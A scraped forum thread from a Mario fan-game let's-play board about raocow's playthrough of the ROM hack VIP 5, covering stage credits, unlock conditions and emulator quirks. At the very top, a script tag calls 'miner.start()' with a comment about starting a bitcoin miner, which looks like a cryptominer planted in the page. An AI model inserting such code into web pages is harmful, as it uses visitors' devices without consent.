<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmbx community

VIP 5 2019 - To everyone there is a boon, and a time to every rom hack under heaven

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Piesonscreations
Posts: 601
Joined: 4 years ago
First name: Gon
Pronouns: he/him/his

Re: VIP 5 2019 - Like a post-game powerup to a hack player

Postby Piesonscreations » 5 months ago

I would say the switch noises are more like "Bripp"
Image

User avatar
raocow
the death of the incredible huge
Posts: 3011
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: VIP 5 2019 - Like a post-game powerup to a hack player

Postby raocow » 5 months ago

that one is good
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Zummorr
Bug Catcher
Posts: 358
Joined: 4 years ago

Re: VIP 5 2019 - Like a post-game powerup to a hack player

Postby Zummorr » 5 months ago

I don't really recall off the top of my head. Is there an easy source of Blue Yoshi in this hack?

Was wondering if it's plausible to get him to cheese the Absurd Athletic? Almost seems intended because there is a Green Koopa right at the start and there is no invisible roof.

User avatar
kitikami
Posts: 498
Joined: 6 years ago

Re: VIP 5 2019 - Like a post-game powerup to a hack player

Postby kitikami » 5 months ago

I don't know about easy to get, but the level two before this where you need Yoshi to use the springboard properly has that random part where you can turn Yoshi blue for seemingly no purpose. So maybe that is what they intended.
Image

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1441
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: VIP 5 2019 - Like a post-game powerup to a hack player

Postby KobaBeach » 5 months ago

raocow wrote:this level is made by carol because it has asm
Image

hoje às

i'd ask 757/boldowa since i share a server with him (#hyperpower, a small groupchat that spun off smwc irc) but he's constantly inactive, so i can't really reach him and i think he ignores notifications on twitter
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
This Eye o' Mine
Posts: 174
Joined: 1 year ago
Pronouns: Nah, I'm good
Location: Ooh, yes please

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby This Eye o' Mine » 5 months ago

Yeah, the audio being scratchy in the retro stages is definitely an emulator thing. Or should I say that the audio not being scratchy was an emulator thing, since ZSNES is legendary for having really lazy audio emulation. There's not much we could do about it since none of us are experts on this sort of thing, though if it's ever figured out somehow it'll be an update.
Image
Image
Image

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1441
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby KobaBeach » 5 months ago

twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
This Eye o' Mine
Posts: 174
Joined: 1 year ago
Pronouns: Nah, I'm good
Location: Ooh, yes please

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby This Eye o' Mine » 5 months ago

I was going to edit my previous post with this but then another post followed it and I thought it would be weird.

This stage had a minor compatibility issue that would cause the background to flash a painful shade of bright yellow for one frame when you entered the final area.
Image
It seemed to be due to the stage's custom ASM initialization taking too long in the NMI routine.

There's not much else to say about it, so have some screenshots of what happened when I messed with some RAM and ROM values that I found were being used to control the custom ASM in this stage:
Image
Image
Image
Image
Image
Image

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 1081
Joined: 6 years ago
Location: the world is no longer a place

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby BobisOnlyBob » 5 months ago

quoting for aesthetic value
BOB is an acronym for BOB is Only BOB etc.

User avatar
raocow
the death of the incredible huge
Posts: 3011
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby raocow » 5 months ago

no I thought it was made by carol because someone said something to that effect in the old run :(
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1441
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby KobaBeach » 5 months ago

Image

i will defeat these charlatans in unarmed combat

anyway i checked puki and

Image

It's by Puriny Ping 🐧

Carol's only stages are Red Athletic and Reznor Come Home
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
Grounder
Posts: 3429
Joined: 5 years ago

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby Grounder » 5 months ago

we might possibly end area 42 on episode 42

fitting enough :kood:
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1441
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby KobaBeach » 5 months ago

VIP5 stage Credits:
Juice Sea - Kokunai
Wrecked Ship - Anon
Morton's Swaying Castle - Kaeru
Horse Feeding Grounds - List
The Unnamed Road - Anon
Greengrowth Walking Path - Anon
Life is Money - yubirdvavk
Koopa 'n Paratroopa Road - Anon
No Music, No Life - Anon
The Beanstalk Tree - Anon
Dinosaurs of Fire and Spirit - Anon
The Switch Tunnel of Darkness - Anon
Magic Square of Melencolia - Anon
Absurd Athletic 2 - beyrevia
Flooding Castle 2 - Sui
Pipesy-Daisy! - L3Rt
Endurance - TSC
Scale the Castle Walls - Anon
The Wonders of Nature - Zero
The Four Seasons - Anon
The Alarming Attractions - SIG
Riding the Flowing Clouds - SIG
Hornet Hole - beyrevia
The Ever-Restless Green Hill - Anon
Inside the Jar - Anon
M O U N T A I N C L I M B I N G - Kaeru
Livin' On the Deck - Anon
*whirr* *rumble* *BANG*! - Anon
Red Hot Spring - Anon
Push Onwards with Blue Mega Mole 2 - Anon
Fortress of the Lava Dolphins - Anon
Chase that Koopa 2 - Anon
My Stage - TSC
Lamentably Pathetic - Anon
Green Paradise - Anon
Air Ship - Anon
Really Dreadful Switch Palace - Anon
Surprisingly Magnetic - Anon
Splatter Mountain - Anon
Boo Block House - Anon
Invest Wisely - Anon
Spinnin' and Spinnin'... - OIORD
The Three Colors of the Horse - 8-656
Run! Jump! Yellow Switch! - Kaeru
Among the Clouds? - Kumo no Naka?
A Slippery Place - Anon
Depressingly Drastic - L3Rt
Larry's Mysterious Machines - Kokunai
wahtuh LenD - Anon
Luigi's Being Annoying - Anta
Bullet Hill - Anon
Oh-So-Sultry Cave - Anon
Chargin' Chuck Playground - FY61
The Frozen Ghost House - Anon
One Thousand Nights of Podorui - List
The Greed - Akatsuki
Clear Skies Athletic - 8-656
Saikano - Anon
Back to the Good Ol' Days - SIG
Feeling Utterly Restless - Anon
I Choose You!! - Chima
Catastrophe - Akatsuki
Super Flyer Horse - Anon
Reznor Come Home - Carol
Icy Lake - sym
Stickin' Springs - 1PfJGxh2
Caught Red Armed and Dangerous - Zero
One Room Studio Castle - Homing
What the Sea Lacks is Speed - Anon
Super Malice World - TSC
The Flock of Masochistic Shells - (no author listed, gonna assume either blank name or Anon)
*skipskip* *glubglub* - 1PfJGxh2
Red Athletic - Carol
The Dolphin Super Express - Anon
Mario Generation - Pingu
That Elusive 100 Points - Anon
Maze Castle 2 ~ Vs. Roy - beyrevia
Sky Die-ving - Anon
Cool, Cool Snow Mountain - Igu
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
Ashan
The world has become a place
Posts: 2212
Joined: 9 years ago
Location: Canada

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby Ashan » 5 months ago

This is the single level that actually completely jogged my memory, remembering the name and everything. In particular, it reminded me that back in 2011 I made a video demonstrating you can do the infinite 1-up shell trick in the SMB engine, which in turn made me realize that I apparently played through this game at one point. For some reason I assumed I just watched the LP and never actually played it myself but... I guess I just did.
Image
Image
Image
Image
Image
Image

User avatar
xfix
:)
Posts: 765
Joined: 10 years ago
First name: Konrad Borowski

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby xfix » 5 months ago

KobaBeach wrote: VIP5 stage Credits:
Juice Sea - Kokunai
Wrecked Ship - Anon
Morton's Swaying Castle - Kaeru
Horse Feeding Grounds - List
The Unnamed Road - Anon
Greengrowth Walking Path - Anon
Life is Money - yubirdvavk
Koopa 'n Paratroopa Road - Anon
No Music, No Life - Anon
The Beanstalk Tree - Anon
Dinosaurs of Fire and Spirit - Anon
The Switch Tunnel of Darkness - Anon
Magic Square of Melencolia - Anon
Absurd Athletic 2 - beyrevia
Flooding Castle 2 - Sui
Pipesy-Daisy! - L3Rt
Endurance - TSC
Scale the Castle Walls - Anon
The Wonders of Nature - Zero
The Four Seasons - Anon
The Alarming Attractions - SIG
Riding the Flowing Clouds - SIG
Hornet Hole - beyrevia
The Ever-Restless Green Hill - Anon
Inside the Jar - Anon
M O U N T A I N C L I M B I N G - Kaeru
Livin' On the Deck - Anon
*whirr* *rumble* *BANG*! - Anon
Red Hot Spring - Anon
Push Onwards with Blue Mega Mole 2 - Anon
Fortress of the Lava Dolphins - Anon
Chase that Koopa 2 - Anon
My Stage - TSC
Lamentably Pathetic - Anon
Green Paradise - Anon
Air Ship - Anon
Really Dreadful Switch Palace - Anon
Surprisingly Magnetic - Anon
Splatter Mountain - Anon
Boo Block House - Anon
Invest Wisely - Anon
Spinnin' and Spinnin'... - OIORD
The Three Colors of the Horse - 8-656
Run! Jump! Yellow Switch! - Kaeru
Among the Clouds? - Kumo no Naka?
A Slippery Place - Anon
Depressingly Drastic - L3Rt
Larry's Mysterious Machines - Kokunai
wahtuh LenD - Anon
Luigi's Being Annoying - Anta
Bullet Hill - Anon
Oh-So-Sultry Cave - Anon
Chargin' Chuck Playground - FY61
The Frozen Ghost House - Anon
One Thousand Nights of Podorui - List
The Greed - Akatsuki
Clear Skies Athletic - 8-656
Saikano - Anon
Back to the Good Ol' Days - SIG
Feeling Utterly Restless - Anon
I Choose You!! - Chima
Catastrophe - Akatsuki
Super Flyer Horse - Anon
Reznor Come Home - Carol
Icy Lake - sym
Stickin' Springs - 1PfJGxh2
Caught Red Armed and Dangerous - Zero
One Room Studio Castle - Homing
What the Sea Lacks is Speed - Anon
Super Malice World - TSC
The Flock of Masochistic Shells - (no author listed, gonna assume either blank name or Anon)
*skipskip* *glubglub* - 1PfJGxh2
Red Athletic - Carol
The Dolphin Super Express - Anon
Mario Generation - Pingu
That Elusive 100 Points - Anon
Maze Castle 2 ~ Vs. Roy - beyrevia
Sky Die-ving - Anon
Cool, Cool Snow Mountain - Igu
Surprisingly Magnetic is most likely by :P :P :P, considering the level is in newer versions of Super Mario :P :P :P (however it's unused).

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1441
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby KobaBeach » 5 months ago

I guess? He's just listed as anon (名無し) in the stage credits.

Here's a link to it for those curious (Internet Archive). The archive also contains credits for VIP1-4.
For the last revision of 6 you might have to just look up the threads and make your own :c
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
Piesonscreations
Posts: 601
Joined: 4 years ago
First name: Gon
Pronouns: he/him/his

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby Piesonscreations » 5 months ago

girugaaaaaaa.jpg
girugaaaaaaa.jpg (56.35 KiB) Viewed 1423 times
Image

User avatar
xfix
:)
Posts: 765
Joined: 10 years ago
First name: Konrad Borowski

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby xfix » 5 months ago

KobaBeach wrote: For the last revision of 6 you might have to just look up the threads and make your own :c
Or check out https://web.archive.org/web/20160829122 ... gtrack.cgi, I suppose (VIP6 spoilers, obviously).

strongbadman
Posts: 267
Joined: 8 years ago
Location: USA

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby strongbadman » 5 months ago

Apologies if this has been answered before, but do you have to get all dragon coins to play the special world levels?

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1441
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby KobaBeach » 5 months ago

xfix wrote: Or check out https://web.archive.org/web/20160829122 ... gtrack.cgi, I suppose (VIP6 spoilers, obviously).
God yubird had to handle VIP6 too? Poor guy.
I follow him on twitter, cute fursona.

strongbadman wrote: Apologies if this has been answered before, but do you have to get all dragon coins to play the special world levels?
No, they're unlocked when you beat the R levels.

Melencolia unlocks Podorui
Green Paradise unlocks One Room Studio Castle
wahtuh lend unlocks My Stage
Hornet Hole unlocks 100 Points
Bullet Hill unlocks Absurd Athletic 2
Wrecked Ship unlocks Mario Generation
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

strongbadman
Posts: 267
Joined: 8 years ago
Location: USA

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby strongbadman » 5 months ago

Man I guess in my run I just never played one of those.levles then, because I remember progress being halted at one point in my playthrough. I think I was only allowed to do Podouri

User avatar
raocow
the death of the incredible huge
Posts: 3011
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby raocow » 5 months ago

nothing says 'welcome back from vacation raocow!' more than a two hours, thirty eight minute recording session
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Wesley
Posts: 20
Joined: 5 months ago
Location: Canada

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby Wesley » 5 months ago

Maybe playing that before EVO could have been a good idea. But I don't know you're life schedule :toaster:

User avatar
Awoo
56709
Posts: 1249
Joined: 1 year ago
Pronouns: he/him/his
Location: your area

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to refuse things)

Postby Awoo » 5 months ago

raocow wrote: nothing says 'welcome back from vacation raocow!' more than a two hours, thirty eight minute recording session
'welcome back from vacation raocow!'
I'll say it myself for you if that helps :'3

Well hopefully you can break that down into multiple days of content? Hope you've been able to relax since then at least
ワンワン
Image
Image

User avatar
Wesley
Posts: 20
Joined: 5 months ago
Location: Canada

Re: VIP 5 2019 - Like nostalgia to old people bored of current trends (or who want to reuse titles)

Postby Wesley » 5 months ago

Hoo boy. I think Bowser's Castle gave you less trouble.

I wonder why you never used a blue block to deal with Lakitu at the end. Exhaustion?


Return to “let's play”

Who is online

Users browsing this forum: Google [Bot] and 10 guests